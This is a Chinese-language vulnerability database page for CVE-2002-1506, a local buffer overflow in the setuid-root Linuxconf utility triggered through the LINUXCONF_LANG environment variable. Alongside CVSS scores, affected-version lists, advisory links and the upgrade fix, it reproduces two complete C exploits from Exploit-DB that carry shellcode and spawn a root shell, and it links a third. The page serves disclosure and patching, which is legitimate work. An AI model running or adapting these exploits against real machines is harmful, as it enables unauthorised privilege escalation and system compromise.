CVE-2002-1506
CVSS7.2
发布时间 :2003-04-02 00:00:00
修订时间 :2008-09-05 16:30:46
NMCOES    

[原文]Buffer overflow in Linuxconf before 1.28r4 allows local users to execute arbitrary code via a long LINUXCONF_LANG environment variable, which overflows an error string that is generated.


[CNNVD]Linuxconf本地环境变量缓冲区溢出漏洞。(CNNVD-200304-014)

        Linuxconf 1.28r4之前版本存在缓冲区溢出漏洞。本地用户借助超长环境变量执行任意代码。该漏洞溢出一个已产生的错误字符串。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:jacques_gelinas:linuxconf:1.2.1
cpe:/a:jacques_gelinas:linuxconf:1.2.4r4
cpe:/a:jacques_gelinas:linuxconf:1.1.8
cpe:/a:jacques_gelinas:linuxconf:1.2.3r1
cpe:/a:jacques_gelinas:linuxconf:1.1.9r1
cpe:/a:jacques_gelinas:linuxconf:1.2.1r6
cpe:/a:jacques_gelinas:linuxconf:1.2.3
cpe:/a:jacques_gelinas:linuxconf:1.2.1r2
cpe:/a:jacques_gelinas:linuxconf:1.1.6r10
cpe:/a:jacques_gelinas:linuxconf:1.1.9r2
cpe:/a:jacques_gelinas:linuxconf:1.2r2
cpe:/a:jacques_gelinas:linuxconf:1.2.1r1
cpe:/a:jacques_gelinas:linuxconf:1.28r1
cpe:/a:jacques_gelinas:linuxconf:1.2
cpe:/a:jacques_gelinas:linuxconf:1.2.1r8
cpe:/a:jacques_gelinas:linuxconf:1.27r5
cpe:/a:jacques_gelinas:linuxconf:1.2.3r2
cpe:/a:jacques_gelinas:linuxconf:1.27r4
cpe:/a:jacques_gelinas:linuxconf:1.2.1r7
cpe:/a:jacques_gelinas:linuxconf:1.2.2
cpe:/a:jacques_gelinas:linuxconf:1.2.4r5
cpe:/a:jacques_gelinas:linuxconf:1.2r1
cpe:/a:jacques_gelinas:linuxconf:1.27
cpe:/a:jacques_gelinas:linuxconf:1.2.4
cpe:/a:jacques_gelinas:linuxconf:1.2.1r5
cpe:/a:jacques_gelinas:linuxconf:1.28r2
cpe:/a:jacques_gelinas:linuxconf:1.28
cpe:/a:jacques_gelinas:linuxconf:1.2.1r3
cpe:/a:jacques_gelinas:linuxconf:1.2.4r2
cpe:/a:jacques_gelinas:linuxconf:1.28r3
cpe:/a:jacques_gelinas:linuxconf:1.1.7
cpe:/a:jacques_gelinas:linuxconf:1.2.1r4
cpe:/a:jacques_gelinas:linuxconf:1.27r3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1506
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1506
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200304-014
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/5585
(VENDOR_ADVISORY)  BID  5585
http://www.iss.net/security_center/static/9980.php
(VENDOR_ADVISORY)  XF  linuxconf-linuxconflang-env-bo(9980)
http://archives.neohapsis.com/archives/bugtraq/2002-08/0304.html
(VENDOR_ADVISORY)  BUGTRAQ  20020828 iDEFENSE Security Advisory: Linuxconf locally exploitable buffer overflow
http://archives.neohapsis.com/archives/vulnwatch/2002-q3/0093.html
(UNKNOWN)  VULNWATCH  20020828 iDEFENSE Security Advisory: Linuxconf locally exploitable buffer overflow
http://www.solucorp.qc.ca/changes.hc?projet=linuxconf&version=1.28r4
(UNKNOWN)  MISC  http://www.solucorp.qc.ca/changes.hc?projet=linuxconf&version=1.28r4

- 漏洞信息

Linuxconf本地环境变量缓冲区溢出漏洞。
高危 缓冲区溢出
2003-04-02 00:00:00 2005-10-20 00:00:00
本地  
        Linuxconf 1.28r4之前版本存在缓冲区溢出漏洞。本地用户借助超长环境变量执行任意代码。该漏洞溢出一个已产生的错误字符串。

- 公告与补丁

        The vendor has released a fix which addresses this issue:
        Jacques Gelinas Linuxconf 1.1.6 r10
        
        Jacques Gelinas Linuxconf 1.1.7
        
        Jacques Gelinas Linuxconf 1.1.8
        
        Jacques Gelinas Linuxconf 1.1.9 r2
        
        Jacques Gelinas Linuxconf 1.1.9 r1
        
        Jacques Gelinas Linuxconf 1.2 r1
        
        Jacques Gelinas Linuxconf 1.2 r2
        
        Jacques Gelinas Linuxconf 1.2
        
        Jacques Gelinas Linuxconf 1.2.1 r3
        
        Jacques Gelinas Linuxconf 1.2.1 r1
        
        Jacques Gelinas Linuxconf 1.2.1 r2
        
        Jacques Gelinas Linuxconf 1.2.1 r5
        
        Jacques Gelinas Linuxconf 1.2.1 r7
        
        Jacques Gelinas Linuxconf 1.2.1 r8
        
        Jacques Gelinas Linuxconf 1.2.1 r6
        
        Jacques Gelinas Linuxconf 1.2.1
        
        Jacques Gelinas Linuxconf 1.2.1 r4
        
        Jacques Gelinas Linuxconf 1.2.2
        
        Jacques Gelinas Linuxconf 1.2.3 r1
        
        Jacques Gelinas Linuxconf 1.2.3
        
        Jacques Gelinas Linuxconf 1.2.3 r2
        
        Jacques Gelinas Linuxconf 1.2.4 r2
        
        Jacques Gelinas Linuxconf 1.2.4
        
        Jacques Gelinas Linuxconf 1.2.4 r5
        
        Jacques Gelinas Linuxconf 1.2.4 r4
        
        Jacques Gelinas Linuxconf 1.27 r3
        
        Jacques Gelinas Linuxconf 1.27
        
        Jacques Gelinas Linuxconf 1.27 r5
        
        Jacques Gelinas Linuxconf 1.27 r4
        
        Jacques Gelinas Linuxconf 1.28 r3
        
        Jacques Gelinas Linuxconf 1.28 r2
        
        Jacques Gelinas Linuxconf 1.28
        
        Jacques Gelinas Linuxconf 1.28 r1
        

- 漏洞信息 (21761)

Linuxconf 1.1.x/1.2.x Local Environment Variable Buffer Overflow Vulnerability (1) (EDBID:21761)
linux local
2002-08-28 Verified
0 RaiSe
N/A [点击下载]
source: http://www.securityfocus.com/bid/5585/info

Linuxconf is a Linux configuration utility from Solucorp. It is typically installed as a setuid root utility for the management and configuration of Linux operating systems.

A buffer overflow vulnerability has been reported for Linuxconf. The vulnerability is due to insufficent bounds checking of the LINUXCONF_LANG environment variable. An attacker who sets the LINUXCONF_LANG environment variable with an overly large string will be able to cause the buffer overflow condition. 

/* 
 * Linuxconf <= 1.28r3 local xploit
 * by RaiSe <raise@netsearch-ezine.com>
 * http://www.netsearch-ezine.com
 *
 * Tested on:
 *             Mandrake 8.0
 *             Mandrake 8.2
 *             RedHat   7.3
 *
 * (run without args on directory
 *  with +w)
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <asm/user.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

#define PATHLCONF	"/sbin/linuxconf"


unsigned long get_shell(void);

char shellcode[]=  // by RaiSe
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc9\x51\xb8\x38"
"\x65\x73\x68\x66\x35\x56\x4a\x50\xb8\x65\x65\x62\x69\x66\x35"
"\x4a\x4a\x50\x89\xe3\x51\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b"
"\xcd\x80";


int main(void)
{
FILE *fp;
char buf[2056], buf2[2048];
unsigned long shell, *p;
int i;


printf("\n[ Linuxconf Local Xploit by RaiSe ]\n\n");
fflush(stdout);

sprintf(buf2, "%s.eng", shellcode);

if (mkdir(buf2, S_IRWXU))
	{
	fprintf(stderr, "* Error at creat directory (.eng), +w? is it exist?, "
	                "delete it and run again.\n\n");
	exit(-1);
	}
else	
	sprintf(buf2, "%s.eng/%s.eng", shellcode, shellcode);

if ((fp = fopen(buf2, "w")) == NULL)
	{
    fprintf(stderr, "* Error at creat file,  +w?\n\n");
    exit(-1);
	}
else
	fclose(fp);

printf("* Directory + file created ..\n");
printf("   [dont forget to delete it ;)]\n");
fflush(stdout);

bzero(buf, sizeof(buf));
shell = get_shell();

p = (unsigned long *) buf;

for (i = 0; i < 2048 ; i+=4)
	*p++ = shell;


setenv("SCODE", shellcode, 1);
setenv("LINUXCONF_LANG",buf,1);
execl(PATHLCONF, "linuxconf", NULL);

exit(-1);

} /******* end of main() ******/


unsigned long get_shell(void)
{
unsigned long sc;
struct user_regs_struct regs;
int pid_vuln, n;


/* creamos un proceso */
if (!(pid_vuln = fork()))
	{
	char buf[2056];

	sleep(2);
	bzero(buf, sizeof(buf));
	memset(buf, 0x41, 2048);

	setenv("SCODE", shellcode, 1);
	setenv("LINUXCONF_LANG",buf, 1);
	execl(PATHLCONF, "linuxconf", NULL);

	fprintf(stderr, "Error: execl.\n");
	exit(-1);
	}
else
	{

	if (ptrace(PTRACE_ATTACH, pid_vuln))
		{
		fprintf(stderr, "Error: PTRACE_ATTACH.\n");
		exit(-1);
		}

	waitpid(pid_vuln, NULL, 0);

    printf("\n[* Looking at %%esp .. ]\n");
	fflush(stdout);

    if (ptrace(PTRACE_CONT, pid_vuln, 0, 0))
        {
        fprintf(stderr, "Error: PTRACE_CONT.\n");
        exit(-1);
        }

    waitpid(pid_vuln, NULL, 0);

    if (ptrace(PTRACE_GETREGS, pid_vuln, 0, &regs))
        {
        fprintf(stderr, "Error: PTRACE_GETREGS.\n");
        exit(-1);
        }

	printf("[* Looking at: 0x%08x ]\n", (int) regs.esp);
    fflush(stdout);

	n = 0, sc = 0;

	do 
		{
	    if ((sc = ptrace(PTRACE_PEEKTEXT, pid_vuln,
			 (int)(regs.esp+(n++)), 0)) == -1)
	        {
	        fprintf(stderr, "Error: PTRACE_PEEKTEXT.\n");
	        exit(-1);
    	    }

		} while (sc != 0x90909090);
	
	n--;
	printf("[* Shellcode found at: 0x%08x ]\n", (int)(regs.esp + n));
	fflush(stdout);

	if(ptrace(PTRACE_KILL, pid_vuln, 0, 0))
		{
		fprintf(stderr, "Error: PTRACE_KILL.\n");
		exit(-1);
		}
	else
		{
		waitpid(pid_vuln, NULL, 0);
		printf("[* Xploting .. ]\n\n");
		fflush(stdout);
		sleep(1);
		return((unsigned long)(regs.esp + n));
		}
	}

} /********* enf of get_shell() **********/


/* EOF */
		

- 漏洞信息 (21762)

Linuxconf 1.1.x/1.2.x Local Environment Variable Buffer Overflow Vulnerability (2) (EDBID:21762)
linux local
2002-08-28 Verified
0 David Endler
N/A [点击下载]
source: http://www.securityfocus.com/bid/5585/info
 
Linuxconf is a Linux configuration utility from Solucorp. It is typically installed as a setuid root utility for the management and configuration of Linux operating systems.
 
A buffer overflow vulnerability has been reported for Linuxconf. The vulnerability is due to insufficent bounds checking of the LINUXCONF_LANG environment variable. An attacker who sets the LINUXCONF_LANG environment variable with an overly large string will be able to cause the buffer overflow condition. 

/*
 * This is an exploit for the linuxconf overflow issue.
 *
 * The detail of this hole was published on 08.28.2002 by
 * David Endler from www.idefense.com. 
 *
 * Tested to work on Redhat 7.0 with linuxconf 1.25r3.
 * [The magic numbers that worked for me are: 980 500 2048 1]
 *
 * This is a classical example of stack smashing. Large portion 
 * of code were ripped from Aleph1's. So, credits due to him.
 *
 * Flame or comment goes to: jinyean@hotmail.com 
 *
 */

#include <stdlib.h>
#include <unistd.h>

#define DEFAULT_ALIGN		0
#define DEFAULT_OFFSET		0
#define DEFAULT_BUFFER_SIZE	980
#define DEFAULT_EGG_SIZE	2048
#define NOP			0x90

char shellcode[]=
        "\xeb\x1f\x5e\x89\x76\x09\x31\xc0\x88\x46\x08\x89"
        "\x46\x0d\xb0\x0b\x89\xf3\x8d\x4e\x09\x8d\x56\x0d"
        "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
        "\xff\xff/bin/ash";


unsigned long get_esp(void) {
	__asm__("movl %esp,%eax");
}

main(int argc, char *argv[]) {
	char *buff, *ptr, *egg;
	long *addr_ptr, addr;
	int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
	int i, eggsize=DEFAULT_EGG_SIZE, align=DEFAULT_ALIGN;

	if (argc>1) bsize=atoi(argv[1]);
	if (argc>2) offset=atoi(argv[2]);
	if (argc>3) eggsize=atoi(argv[3]);
	if (argc>4) align=atoi(argv[4]);

	if (!(buff=malloc(bsize))) {
		printf("Can't allocate memory.\n");
		exit(0);
	}
	if (!(egg=malloc(eggsize))) {
		printf("Can't allocate memory.\n");
	        exit(0);
	}

	addr=get_esp()-offset;
	printf("Using address: 0x%x\n",addr);

        ptr=buff;
	addr_ptr=(long *)(ptr+align);

	for (i=0; i<bsize; i+=4) 
		*(addr_ptr++)=addr;

	ptr=egg;

	for (i=0; i<eggsize-strlen(shellcode)-1; i++)
		*(ptr++)=NOP;

	for (i=0; i<strlen(shellcode); i++)
		*(ptr++)=shellcode[i];

	buff[bsize-1]='\0';
	egg[eggsize-1]='\0';

	memcpy(egg,"EGG=",4);
	putenv(egg);
	memcpy(buff,"LINUXCONF_LANG=",15);
	putenv(buff);
	execl("/sbin/linuxconf","linuxconf",NULL);

}
		

- 漏洞信息 (21763)

Linuxconf 1.1.x/1.2.x Local Environment Variable Buffer Overflow Vulnerability (3) (EDBID:21763)
linux local
2002-08-28 Verified
0 syscalls
N/A [点击下载]
source: http://www.securityfocus.com/bid/5585/info
  
Linuxconf is a Linux configuration utility from Solucorp. It is typically installed as a setuid root utility for the management and configuration of Linux operating systems.
  
A buffer overflow vulnerability has been reported for Linuxconf. The vulnerability is due to insufficent bounds checking of the LINUXCONF_LANG environment variable. An attacker who sets the LINUXCONF_LANG environment variable with an overly large string will be able to cause the buffer overflow condition. 

http://www.exploit-db.com/sploits/21763.tar.gz		

- 漏洞信息

6067
Linuxconf LINUXCONF_LANG Variable Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Unknown

- 漏洞描述

linuxconf contains a flaw that may allow a malicious user to gain root privileges. The issue is triggered when passing 964 or more bytes of data to the LINUXCONF_LANG environmental variable overflowing a buffer. It is possible that the flaw may allow arbitrary command execution resulting in a loss of confidentiality and integrity.

- 时间线

2002-08-28 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 1.28r4 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround: remove the setuid bit from the linuxconf binary.

- 相关参考

- 漏洞作者

- 漏洞信息

Linuxconf Local Environment Variable Buffer Overflow Vulnerability
Boundary Condition Error 5585
No Yes
2002-08-28 12:00:00 2009-07-11 03:56:00
Discovery of this vulnerability credited to Euan Briggs (euan_briggs@btinternet.com).

- 受影响的程序版本

Jacques Gelinas Linuxconf 1.28 r3
+ RedHat Linux 7.3
Jacques Gelinas Linuxconf 1.28 r2
Jacques Gelinas Linuxconf 1.28 r1
Jacques Gelinas Linuxconf 1.28
Jacques Gelinas Linuxconf 1.27 r5
Jacques Gelinas Linuxconf 1.27 r4
Jacques Gelinas Linuxconf 1.27 r3
Jacques Gelinas Linuxconf 1.27
Jacques Gelinas Linuxconf 1.2.4 r5
Jacques Gelinas Linuxconf 1.2.4 r4
Jacques Gelinas Linuxconf 1.2.4 r2
Jacques Gelinas Linuxconf 1.2.4
Jacques Gelinas Linuxconf 1.2.3 r2
Jacques Gelinas Linuxconf 1.2.3 r1
Jacques Gelinas Linuxconf 1.2.3
Jacques Gelinas Linuxconf 1.2.2
Jacques Gelinas Linuxconf 1.2.1 r8
Jacques Gelinas Linuxconf 1.2.1 r7
Jacques Gelinas Linuxconf 1.2.1 r6
Jacques Gelinas Linuxconf 1.2.1 r5
Jacques Gelinas Linuxconf 1.2.1 r4
Jacques Gelinas Linuxconf 1.2.1 r3
Jacques Gelinas Linuxconf 1.2.1 r2
Jacques Gelinas Linuxconf 1.2.1 r1
Jacques Gelinas Linuxconf 1.2.1
Jacques Gelinas Linuxconf 1.2 r2
Jacques Gelinas Linuxconf 1.2 r1
Jacques Gelinas Linuxconf 1.2
Jacques Gelinas Linuxconf 1.1.9 r2
Jacques Gelinas Linuxconf 1.1.9 r1
Jacques Gelinas Linuxconf 1.1.8
Jacques Gelinas Linuxconf 1.1.7
Jacques Gelinas Linuxconf 1.1.6 r10
Jacques Gelinas Linuxconf 1.28 r4

- 不受影响的程序版本

Jacques Gelinas Linuxconf 1.28 r4

- 漏洞讨论

Linuxconf is a Linux configuration utility from Solucorp. It is typically installed as a setuid root utility for the management and configuration of Linux operating systems.

A buffer overflow vulnerability has been reported for Linuxconf. The vulnerability is due to insufficent bounds checking of the LINUXCONF_LANG environment variable. An attacker who sets the LINUXCONF_LANG environment variable with an overly large string will be able to cause the buffer overflow condition.

- 漏洞利用

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

- 解决方案

The vendor has released a fix which addresses this issue:


Jacques Gelinas Linuxconf 1.1.6 r10

Jacques Gelinas Linuxconf 1.1.7

Jacques Gelinas Linuxconf 1.1.8

Jacques Gelinas Linuxconf 1.1.9 r2

Jacques Gelinas Linuxconf 1.1.9 r1

Jacques Gelinas Linuxconf 1.2 r1

Jacques Gelinas Linuxconf 1.2 r2

Jacques Gelinas Linuxconf 1.2

Jacques Gelinas Linuxconf 1.2.1 r3

Jacques Gelinas Linuxconf 1.2.1 r1

Jacques Gelinas Linuxconf 1.2.1 r2

Jacques Gelinas Linuxconf 1.2.1 r5

Jacques Gelinas Linuxconf 1.2.1 r7

Jacques Gelinas Linuxconf 1.2.1 r8

Jacques Gelinas Linuxconf 1.2.1 r6

Jacques Gelinas Linuxconf 1.2.1

Jacques Gelinas Linuxconf 1.2.1 r4

Jacques Gelinas Linuxconf 1.2.2

Jacques Gelinas Linuxconf 1.2.3 r1

Jacques Gelinas Linuxconf 1.2.3

Jacques Gelinas Linuxconf 1.2.3 r2

Jacques Gelinas Linuxconf 1.2.4 r2

Jacques Gelinas Linuxconf 1.2.4

Jacques Gelinas Linuxconf 1.2.4 r5

Jacques Gelinas Linuxconf 1.2.4 r4

Jacques Gelinas Linuxconf 1.27 r3

Jacques Gelinas Linuxconf 1.27

Jacques Gelinas Linuxconf 1.27 r5

Jacques Gelinas Linuxconf 1.27 r4

Jacques Gelinas Linuxconf 1.28 r3

Jacques Gelinas Linuxconf 1.28 r2

Jacques Gelinas Linuxconf 1.28

Jacques Gelinas Linuxconf 1.28 r1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站